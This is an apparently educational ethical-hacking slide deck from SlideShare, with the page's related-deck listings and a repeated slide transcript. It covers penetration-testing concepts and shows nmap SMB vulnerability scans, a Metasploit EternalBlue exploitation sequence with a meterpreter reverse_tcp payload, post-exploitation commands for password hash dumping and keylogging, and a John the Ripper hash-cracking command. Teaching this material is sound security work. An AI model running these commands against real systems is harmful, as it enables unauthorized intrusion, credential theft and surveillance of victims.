Introduction To Ethical Hacking

Raghav Bisht
Raghav BishtSecurity Researcher à Pyramid Cyber Security & Forensic
Introduction To Ethical Hacking
What is Hacking ?
 Process to bypass the security mechanisms.
 Unauthorized use of computer and network.
 Hacking is the practice of modifying the features of a
system, in order to accomplish a goal outside of the
creator's original purpose.
 Hacking is the process of exploiting vulnerabilities to
gain unauthorized access to systems or resources.
Who are hackers ?
 Hacker is a term used by some to mean "a clever
programmer" and by others, especially those in
popular media, to mean "someone who tries to break
into computer systems."
Types of Hackers
 White Hat
 IT professional
 Administrators
 Black Hat
 Crackers
 Grey Hat
Understanding the need to hack
your own system
 Basis for Ethical Hacking.
 To catch a thief, think like a thief
Overall goals of an ethical hacker
 Hack your systems in a nondestructive fashion.
 Enumerate vulnerabilities and , if necessary, prove
to management that vulnerabilities exit and can be
exploited.
 Apply result to remove the vulnerabilities and
better secure your systems.
Vulnerability Assessment
 A vulnerability assessment is the process of defining,
identifying, classifying and prioritizing vulnerabilities
in computer systems, applications and network
infrastructures and providing the organization doing
the assessment with the necessary knowledge,
awareness and risk background to understand the
threats to its environment and react appropriately.
Vulnerability Assessment Tools
 Nexpose Community
 QualysGuard
 OpenVAS
 Nikto
 Nmap
 Nessus Professional
 Acunetix
 Netsparker
 IBM AppScan
 Burp Suite
What is Penetration Testing
 A penetration test, also known as a pen test, is a
simulated cyber attack against your network,
infrastructure, devices, computer system or any other
environment to check for exploitable vulnerabilities.
Types of Penetration Tests
 Black Box Penetration Testing
 White Box Penetration Testing
 Grey Box Penetration Testing
Black Box Penetration Testing
 In black box penetration testing, tester has no idea
about the systems that he is going to test. He is
interested to gather information about the target
network or system. For example, in this testing, a
tester only knows what should be the expected
outcome and he does not know how the outcomes
arrives. He does not examine any programming codes.
White Box Penetration Testing
 This is a comprehensive testing, as tester has been
provided with whole range of information about the
systems and/or network such as Schema, Source code,
OS details, IP address, etc. It is normally considered as
a simulation of an attack by an internal source. It is
also known as structural, glass box, clear box, and open
box testing.
 White box penetration testing examines the code
coverage and does data flow testing, path testing, loop
testing, etc.
Grey Box Penetration Testing
 In this type of testing, a tester usually provides partial
or limited information about the internal details of the
program of a system. It can be considered as an attack
by an external hacker who had gained illegitimate
access to an organization's network infrastructure
documents.
Penetration Testing Stages
Top 10 Common Vulnerabilities
 SQL Injection
 Cross Site Scripting
 Broken Authentication and Session Management
 Insecure Direct Object References
 Cross Site Request Forgery
 Security Misconfiguration
 Insecure Cryptographic Storage
 Failure to restrict URL Access
 Insufficient Transport Layer Protection
 Un-validated Redirects and Forwards
Demo Website and VMs
 https://demo.testfire.net
 http://testphp.vulnweb.com
 OWASP Mutillidae II
 Attack-defense online lab
Introduction To Ethical Hacking
Building Hacking Environment
 Kali Linux - http://www.kali.org/downloads/
Kali Linux
Ports Scanning With NMAP
 nmap –sS -T4 –v <target>
Foot-printing Services With NMAP
 nmap –sS –sV -T4 –v <target>
Vulnerability Scanning With NMAP
 nmap -sS -sV -p 445 -T4 -v --script smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06-
025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-
ms17-010 192.168.10.135
Web Vulnerability Scanning
 OWASP ZAP – zaproxy
Starting with Metasploit !!!
 The Metasploit project is an open-source, computer
security project which provides information about
security vulnerabilities and aids in penetration testing
and IDS signature development.
 Metasploit is an framework which is used for the
hacking of different kinds of applications, operating
systems, web applications etc.
What is metasploit ?
 Metasploit contain various exploits, payloads, modules
etc.
 Metasploit Framework is especially used by many of
the hackers to generate payloads and attack the
systems.
 As Metasploit is an open source where any one can use
it. This framework supports different operating
systems like windows, linux ,mac os x etc.
Metasploit terms
 Exploit  used to take advantage of a security flaw
within a system, network, or application.
 Payload  is code that our victim computer to
execute by the Metasploit framework.
 Module  a small piece of code that can be added to
the Metasploit framework to execute an attack.
 Shell-code  a small piece of code used as a payload.
What is a vulnerability?
 A vulnerability is a security hole in a piece of software,
hardware or operating system that provides a potential
angle to attack the system.
 A vulnerability can be as simple as weak passwords or
as complex as buffer overflows or SQL injection
vulnerabilities.
What is an exploit?
 To take advantage of a vulnerability, you often need an
exploit, a small and highly specialized computer
program whose only reason of being is to take
advantage of a specific vulnerability and to provide
access to a computer system.
 Exploits often deliver a payload to the target system to
grant the attacker access to the system.
What is a payload?
 A payload is the piece of software that lets you control
a computer system after it’s been exploited.
 The payload is typically attached to and delivered by
the exploit.
 Metasploit most popular payload is called Meterpreter,
which enables you to do all sorts of funky stuff on the
target system. For example, you can upload and
download files from the system, take screenshots, and
collect password hashes etc.
What is msfconsole ?
 MSFconsole is an all-in-one interface to most of the
features in Metasploit.
 MSFconsole can be used to launch attacks, creating
listeners, and much, much more.
 Commands :
 Show exploits
 Show payloads
 Show options
 Use exploit
Commands
 set payload
 Set LHOST
 Set RHOST
 Back
 Info
 Session
 Session –l
 Session –i 1
Meterpreter commands
 Getuid -> show uid
 Ps -> show active process
 Migrate -> command used when hacker want to
migrate his process to any administrative privileges
process.
 Hashdump -> to dump password hash.
 Screenshot -> to take screenshot of victim.
 Shell -> to enter into the victim shell.
 download C:<file name>
 upload C:<file name>
More Meterpreter commands
 keyscan_start -> start sniffing key strokes.
 keyscan_dump
 keyscan_stop
 uictl disable keyboard
 uictl enable keyboard
Demonstration - Service Exploitation
Reconnaissance
 Ports and service scan of target system
>> nmap -sS -p445 -sV -v <victim_IP>
Exploitation – ms17_010_eternalblue
>> msfconsole
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf > set payload windows/x64/meterpreter/reverse_tcp
msf5 > show options
msf5 > set RHOST <victim_IP>
Exploitation – ms17_010_eternalblue
Exploitation – ms17_010_eternalblue
Introduction To Ethical Hacking
Windows Password Cracking
 John the ripper
 Command : John –format=LM –wordlist= /usr/share/commix/src/txt/password_john.txt hash.txt
Introduction To Ethical Hacking
Introduction To Ethical Hacking
1 sur 42

Recommandé

Inetsecurity.in Ethical Hacking presentation par
Inetsecurity.in Ethical Hacking presentationInetsecurity.in Ethical Hacking presentation
Inetsecurity.in Ethical Hacking presentationJoshua Prince
1.4K vues35 diapositives
Ethical hacking : Its methodologies and tools par
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolschrizjohn896
622 vues31 diapositives
Ethical hacking a research paper par
Ethical hacking a research paperEthical hacking a research paper
Ethical hacking a research paperBilal Hameed
1.4K vues18 diapositives
CSE-Ethical-Hacking-ppt.pptx par
CSE-Ethical-Hacking-ppt.pptxCSE-Ethical-Hacking-ppt.pptx
CSE-Ethical-Hacking-ppt.pptxAnshumaanTiwari2
286 vues25 diapositives
Ethical hacking ppt par
Ethical hacking pptEthical hacking ppt
Ethical hacking ppthimanshujoshi238
776 vues31 diapositives
Ethical Hacking Powerpoint par
Ethical Hacking PowerpointEthical Hacking Powerpoint
Ethical Hacking PowerpointRen Tuazon
3.9K vues17 diapositives

Contenu connexe

Tendances

Hacking,History Of Hacking,Types of Hacking,Types Of Hackers,Cyber Laws for ... par
Hacking,History Of Hacking,Types of Hacking,Types  Of Hackers,Cyber Laws for ...Hacking,History Of Hacking,Types of Hacking,Types  Of Hackers,Cyber Laws for ...
Hacking,History Of Hacking,Types of Hacking,Types Of Hackers,Cyber Laws for ...Qazi Anwar
4.3K vues29 diapositives
Presentation on ethical hacking par
Presentation on ethical hackingPresentation on ethical hacking
Presentation on ethical hackingSunny Sundeep
734 vues12 diapositives
Ethical Hacking par
Ethical HackingEthical Hacking
Ethical HackingTharindu Kalubowila
2.9K vues20 diapositives
Ethical hacking par
Ethical hackingEthical hacking
Ethical hackingAlapan Banerjee
802 vues39 diapositives
Ethical hacking par
Ethical hacking Ethical hacking
Ethical hacking Institute of Information Security (IIS)
3.5K vues28 diapositives
Types of Malware (CEH v11) par
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)EC-Council
694 vues14 diapositives

Tendances(20)

Hacking,History Of Hacking,Types of Hacking,Types Of Hackers,Cyber Laws for ... par Qazi Anwar
Hacking,History Of Hacking,Types of Hacking,Types  Of Hackers,Cyber Laws for ...Hacking,History Of Hacking,Types of Hacking,Types  Of Hackers,Cyber Laws for ...
Hacking,History Of Hacking,Types of Hacking,Types Of Hackers,Cyber Laws for ...
Qazi Anwar4.3K vues
Presentation on ethical hacking par Sunny Sundeep
Presentation on ethical hackingPresentation on ethical hacking
Presentation on ethical hacking
Sunny Sundeep734 vues
Types of Malware (CEH v11) par EC-Council
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
EC-Council694 vues
Introduction to ethical hacking par ankit sarode
Introduction to ethical hackingIntroduction to ethical hacking
Introduction to ethical hacking
ankit sarode2.1K vues
Career in Ethical Hacking par neosphere
Career in Ethical Hacking Career in Ethical Hacking
Career in Ethical Hacking
neosphere354 vues
Threats and Security Tips of Computer System par Faruk_Hossen
Threats and Security Tips of Computer SystemThreats and Security Tips of Computer System
Threats and Security Tips of Computer System
Faruk_Hossen857 vues
Introduction to Malware Analysis par Andrew McNicol
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol8.4K vues
Ransomware - The Growing Threat par Nick Miller
Ransomware - The Growing ThreatRansomware - The Growing Threat
Ransomware - The Growing Threat
Nick Miller1.1K vues
System hacking par CAS
System hackingSystem hacking
System hacking
CAS2.6K vues
Ethical Hacking n VAPT presentation by Suvrat jain par Suvrat Jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain6.5K vues

Similaire à Introduction To Ethical Hacking

Introduction To Exploitation & Metasploit par
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
1.5K vues21 diapositives
Pentesting with linux par
Pentesting with linuxPentesting with linux
Pentesting with linuxHammad Ahmed Khawaja
353 vues24 diapositives
Ethical hacking/ Penetration Testing par
Ethical hacking/ Penetration TestingEthical hacking/ Penetration Testing
Ethical hacking/ Penetration TestingANURAG CHAKRABORTY
692 vues28 diapositives
Finalppt metasploit par
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
6.5K vues57 diapositives
Introduction to penetration testing par
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
1.9K vues14 diapositives
Module 5 (system hacking) par
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)Wail Hassan
235 vues88 diapositives

Similaire à Introduction To Ethical Hacking(20)

Introduction To Exploitation & Metasploit par Raghav Bisht
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht1.5K vues
Finalppt metasploit par devilback
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback6.5K vues
Introduction to penetration testing par Nezar Alazzabi
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi1.9K vues
Module 5 (system hacking) par Wail Hassan
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)
Wail Hassan235 vues
Penetration testing par PTC
Penetration testing Penetration testing
Penetration testing
PTC691 vues
Exploits Attack on Windows Vulnerabilities par Amit Kumbhar
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar594 vues
Final project.ppt par shreyng
Final project.pptFinal project.ppt
Final project.ppt
shreyng313 vues
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach par IRJET Journal
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET Journal28 vues
01_Metasploit - The Elixir of Network Security par Harish Chaudhary
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
Harish Chaudhary356 vues
ethical-hacking-guide par Matt Ford
ethical-hacking-guideethical-hacking-guide
ethical-hacking-guide
Matt Ford530 vues
Ethical hacking-guide-infosec par Erfan Mallick
Ethical hacking-guide-infosecEthical hacking-guide-infosec
Ethical hacking-guide-infosec
Erfan Mallick283 vues

Plus de Raghav Bisht

OSINT - Yandex Search par
OSINT - Yandex SearchOSINT - Yandex Search
OSINT - Yandex SearchRaghav Bisht
1.6K vues26 diapositives
OSINT - Twitter Searches par
OSINT - Twitter SearchesOSINT - Twitter Searches
OSINT - Twitter SearchesRaghav Bisht
203 vues19 diapositives
OSINT Tool - Reconnaissance with Recon-ng par
OSINT Tool - Reconnaissance with Recon-ngOSINT Tool - Reconnaissance with Recon-ng
OSINT Tool - Reconnaissance with Recon-ngRaghav Bisht
436 vues19 diapositives
OSINT Tool - Reconnaissance with Maltego par
OSINT Tool - Reconnaissance with MaltegoOSINT Tool - Reconnaissance with Maltego
OSINT Tool - Reconnaissance with MaltegoRaghav Bisht
518 vues18 diapositives
OSINT - Linkedin Search Slides par
OSINT - Linkedin Search SlidesOSINT - Linkedin Search Slides
OSINT - Linkedin Search SlidesRaghav Bisht
174 vues22 diapositives
OSINT - Facebook Searches par
OSINT - Facebook SearchesOSINT - Facebook Searches
OSINT - Facebook SearchesRaghav Bisht
367 vues24 diapositives

Plus de Raghav Bisht(19)

OSINT Tool - Reconnaissance with Recon-ng par Raghav Bisht
OSINT Tool - Reconnaissance with Recon-ngOSINT Tool - Reconnaissance with Recon-ng
OSINT Tool - Reconnaissance with Recon-ng
Raghav Bisht436 vues
OSINT Tool - Reconnaissance with Maltego par Raghav Bisht
OSINT Tool - Reconnaissance with MaltegoOSINT Tool - Reconnaissance with Maltego
OSINT Tool - Reconnaissance with Maltego
Raghav Bisht518 vues
OSINT - Linkedin Search Slides par Raghav Bisht
OSINT - Linkedin Search SlidesOSINT - Linkedin Search Slides
OSINT - Linkedin Search Slides
Raghav Bisht174 vues
OSINT - Facebook Searches par Raghav Bisht
OSINT - Facebook SearchesOSINT - Facebook Searches
OSINT - Facebook Searches
Raghav Bisht367 vues
Osint - Dark side of Internet par Raghav Bisht
Osint - Dark side of InternetOsint - Dark side of Internet
Osint - Dark side of Internet
Raghav Bisht305 vues
Intrusion Detection System Project Report par Raghav Bisht
Intrusion Detection System Project ReportIntrusion Detection System Project Report
Intrusion Detection System Project Report
Raghav Bisht10K vues
Ethical Hacking (CEH) - Industrial Training Report par Raghav Bisht
Ethical Hacking (CEH) - Industrial Training ReportEthical Hacking (CEH) - Industrial Training Report
Ethical Hacking (CEH) - Industrial Training Report
Raghav Bisht4.3K vues
Os Command Injection Attack par Raghav Bisht
Os Command Injection AttackOs Command Injection Attack
Os Command Injection Attack
Raghav Bisht530 vues
Introduction To Vulnerability Assessment & Penetration Testing par Raghav Bisht
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
Raghav Bisht768 vues
Directory Traversal & File Inclusion Attacks par Raghav Bisht
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
Raghav Bisht1.2K vues
Antivirus Bypass Techniques - 2016 par Raghav Bisht
Antivirus Bypass Techniques - 2016Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016
Raghav Bisht922 vues
Hacking in shadows By - Raghav Bisht par Raghav Bisht
Hacking in shadows By - Raghav BishtHacking in shadows By - Raghav Bisht
Hacking in shadows By - Raghav Bisht
Raghav Bisht16.8K vues
Web-servers & Application Hacking par Raghav Bisht
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
Raghav Bisht22.7K vues
Introduction To Hacking par Raghav Bisht
Introduction To HackingIntroduction To Hacking
Introduction To Hacking
Raghav Bisht3.6K vues
Windows Registry Tips & Tricks par Raghav Bisht
Windows Registry Tips & TricksWindows Registry Tips & Tricks
Windows Registry Tips & Tricks
Raghav Bisht8.8K vues

Dernier

Melek BEN MAHMOUD.pdf par
Melek BEN MAHMOUD.pdfMelek BEN MAHMOUD.pdf
Melek BEN MAHMOUD.pdfMelekBenMahmoud
14 vues1 diapositive
STPI OctaNE CoE Brochure.pdf par
STPI OctaNE CoE Brochure.pdfSTPI OctaNE CoE Brochure.pdf
STPI OctaNE CoE Brochure.pdfmadhurjyapb
13 vues1 diapositive
Five Things You SHOULD Know About Postman par
Five Things You SHOULD Know About PostmanFive Things You SHOULD Know About Postman
Five Things You SHOULD Know About PostmanPostman
30 vues43 diapositives
Empathic Computing: Delivering the Potential of the Metaverse par
Empathic Computing: Delivering  the Potential of the MetaverseEmpathic Computing: Delivering  the Potential of the Metaverse
Empathic Computing: Delivering the Potential of the MetaverseMark Billinghurst
476 vues80 diapositives
PRODUCT PRESENTATION.pptx par
PRODUCT PRESENTATION.pptxPRODUCT PRESENTATION.pptx
PRODUCT PRESENTATION.pptxangelicacueva6
13 vues1 diapositive
Democratising digital commerce in India-Report par
Democratising digital commerce in India-ReportDemocratising digital commerce in India-Report
Democratising digital commerce in India-ReportKapil Khandelwal (KK)
15 vues161 diapositives

Dernier(20)

STPI OctaNE CoE Brochure.pdf par madhurjyapb
STPI OctaNE CoE Brochure.pdfSTPI OctaNE CoE Brochure.pdf
STPI OctaNE CoE Brochure.pdf
madhurjyapb13 vues
Five Things You SHOULD Know About Postman par Postman
Five Things You SHOULD Know About PostmanFive Things You SHOULD Know About Postman
Five Things You SHOULD Know About Postman
Postman30 vues
Empathic Computing: Delivering the Potential of the Metaverse par Mark Billinghurst
Empathic Computing: Delivering  the Potential of the MetaverseEmpathic Computing: Delivering  the Potential of the Metaverse
Empathic Computing: Delivering the Potential of the Metaverse
Special_edition_innovator_2023.pdf par WillDavies22
Special_edition_innovator_2023.pdfSpecial_edition_innovator_2023.pdf
Special_edition_innovator_2023.pdf
WillDavies2217 vues
Attacking IoT Devices from a Web Perspective - Linux Day par Simone Onofri
Attacking IoT Devices from a Web Perspective - Linux Day Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day
Simone Onofri15 vues
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas... par Bernd Ruecker
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
Bernd Ruecker33 vues
STKI Israeli Market Study 2023 corrected forecast 2023_24 v3.pdf par Dr. Jimmy Schwarzkopf
STKI Israeli Market Study 2023   corrected forecast 2023_24 v3.pdfSTKI Israeli Market Study 2023   corrected forecast 2023_24 v3.pdf
STKI Israeli Market Study 2023 corrected forecast 2023_24 v3.pdf
Case Study Copenhagen Energy and Business Central.pdf par Aitana
Case Study Copenhagen Energy and Business Central.pdfCase Study Copenhagen Energy and Business Central.pdf
Case Study Copenhagen Energy and Business Central.pdf
Aitana16 vues
The details of description: Techniques, tips, and tangents on alternative tex... par BookNet Canada
The details of description: Techniques, tips, and tangents on alternative tex...The details of description: Techniques, tips, and tangents on alternative tex...
The details of description: Techniques, tips, and tangents on alternative tex...
BookNet Canada126 vues
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N... par James Anderson
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
James Anderson66 vues
PharoJS - Zürich Smalltalk Group Meetup November 2023 par Noury Bouraqadi
PharoJS - Zürich Smalltalk Group Meetup November 2023PharoJS - Zürich Smalltalk Group Meetup November 2023
PharoJS - Zürich Smalltalk Group Meetup November 2023
Noury Bouraqadi126 vues
Unit 1_Lecture 2_Physical Design of IoT.pdf par StephenTec
Unit 1_Lecture 2_Physical Design of IoT.pdfUnit 1_Lecture 2_Physical Design of IoT.pdf
Unit 1_Lecture 2_Physical Design of IoT.pdf
StephenTec12 vues

Introduction To Ethical Hacking

  • 2. What is Hacking ?  Process to bypass the security mechanisms.  Unauthorized use of computer and network.  Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose.  Hacking is the process of exploiting vulnerabilities to gain unauthorized access to systems or resources.
  • 3. Who are hackers ?  Hacker is a term used by some to mean "a clever programmer" and by others, especially those in popular media, to mean "someone who tries to break into computer systems."
  • 4. Types of Hackers  White Hat  IT professional  Administrators  Black Hat  Crackers  Grey Hat
  • 5. Understanding the need to hack your own system  Basis for Ethical Hacking.  To catch a thief, think like a thief
  • 6. Overall goals of an ethical hacker  Hack your systems in a nondestructive fashion.  Enumerate vulnerabilities and , if necessary, prove to management that vulnerabilities exit and can be exploited.  Apply result to remove the vulnerabilities and better secure your systems.
  • 7. Vulnerability Assessment  A vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.
  • 8. Vulnerability Assessment Tools  Nexpose Community  QualysGuard  OpenVAS  Nikto  Nmap  Nessus Professional  Acunetix  Netsparker  IBM AppScan  Burp Suite
  • 9. What is Penetration Testing  A penetration test, also known as a pen test, is a simulated cyber attack against your network, infrastructure, devices, computer system or any other environment to check for exploitable vulnerabilities.
  • 10. Types of Penetration Tests  Black Box Penetration Testing  White Box Penetration Testing  Grey Box Penetration Testing
  • 11. Black Box Penetration Testing  In black box penetration testing, tester has no idea about the systems that he is going to test. He is interested to gather information about the target network or system. For example, in this testing, a tester only knows what should be the expected outcome and he does not know how the outcomes arrives. He does not examine any programming codes.
  • 12. White Box Penetration Testing  This is a comprehensive testing, as tester has been provided with whole range of information about the systems and/or network such as Schema, Source code, OS details, IP address, etc. It is normally considered as a simulation of an attack by an internal source. It is also known as structural, glass box, clear box, and open box testing.  White box penetration testing examines the code coverage and does data flow testing, path testing, loop testing, etc.
  • 13. Grey Box Penetration Testing  In this type of testing, a tester usually provides partial or limited information about the internal details of the program of a system. It can be considered as an attack by an external hacker who had gained illegitimate access to an organization's network infrastructure documents.
  • 15. Top 10 Common Vulnerabilities  SQL Injection  Cross Site Scripting  Broken Authentication and Session Management  Insecure Direct Object References  Cross Site Request Forgery  Security Misconfiguration  Insecure Cryptographic Storage  Failure to restrict URL Access  Insufficient Transport Layer Protection  Un-validated Redirects and Forwards
  • 16. Demo Website and VMs  https://demo.testfire.net  http://testphp.vulnweb.com  OWASP Mutillidae II  Attack-defense online lab
  • 18. Building Hacking Environment  Kali Linux - http://www.kali.org/downloads/
  • 20. Ports Scanning With NMAP  nmap –sS -T4 –v <target>
  • 21. Foot-printing Services With NMAP  nmap –sS –sV -T4 –v <target>
  • 22. Vulnerability Scanning With NMAP  nmap -sS -sV -p 445 -T4 -v --script smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06- 025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln- ms17-010 192.168.10.135
  • 23. Web Vulnerability Scanning  OWASP ZAP – zaproxy
  • 24. Starting with Metasploit !!!  The Metasploit project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.  Metasploit is an framework which is used for the hacking of different kinds of applications, operating systems, web applications etc.
  • 25. What is metasploit ?  Metasploit contain various exploits, payloads, modules etc.  Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems.  As Metasploit is an open source where any one can use it. This framework supports different operating systems like windows, linux ,mac os x etc.
  • 26. Metasploit terms  Exploit  used to take advantage of a security flaw within a system, network, or application.  Payload  is code that our victim computer to execute by the Metasploit framework.  Module  a small piece of code that can be added to the Metasploit framework to execute an attack.  Shell-code  a small piece of code used as a payload.
  • 27. What is a vulnerability?  A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system.  A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.
  • 28. What is an exploit?  To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.  Exploits often deliver a payload to the target system to grant the attacker access to the system.
  • 29. What is a payload?  A payload is the piece of software that lets you control a computer system after it’s been exploited.  The payload is typically attached to and delivered by the exploit.  Metasploit most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes etc.
  • 30. What is msfconsole ?  MSFconsole is an all-in-one interface to most of the features in Metasploit.  MSFconsole can be used to launch attacks, creating listeners, and much, much more.  Commands :  Show exploits  Show payloads  Show options  Use exploit
  • 31. Commands  set payload  Set LHOST  Set RHOST  Back  Info  Session  Session –l  Session –i 1
  • 32. Meterpreter commands  Getuid -> show uid  Ps -> show active process  Migrate -> command used when hacker want to migrate his process to any administrative privileges process.  Hashdump -> to dump password hash.  Screenshot -> to take screenshot of victim.  Shell -> to enter into the victim shell.  download C:<file name>  upload C:<file name>
  • 33. More Meterpreter commands  keyscan_start -> start sniffing key strokes.  keyscan_dump  keyscan_stop  uictl disable keyboard  uictl enable keyboard
  • 34. Demonstration - Service Exploitation
  • 35. Reconnaissance  Ports and service scan of target system >> nmap -sS -p445 -sV -v <victim_IP>
  • 36. Exploitation – ms17_010_eternalblue >> msfconsole msf5 > use exploit/windows/smb/ms17_010_eternalblue msf > set payload windows/x64/meterpreter/reverse_tcp
  • 37. msf5 > show options msf5 > set RHOST <victim_IP> Exploitation – ms17_010_eternalblue
  • 40. Windows Password Cracking  John the ripper  Command : John –format=LM –wordlist= /usr/share/commix/src/txt/password_john.txt hash.txt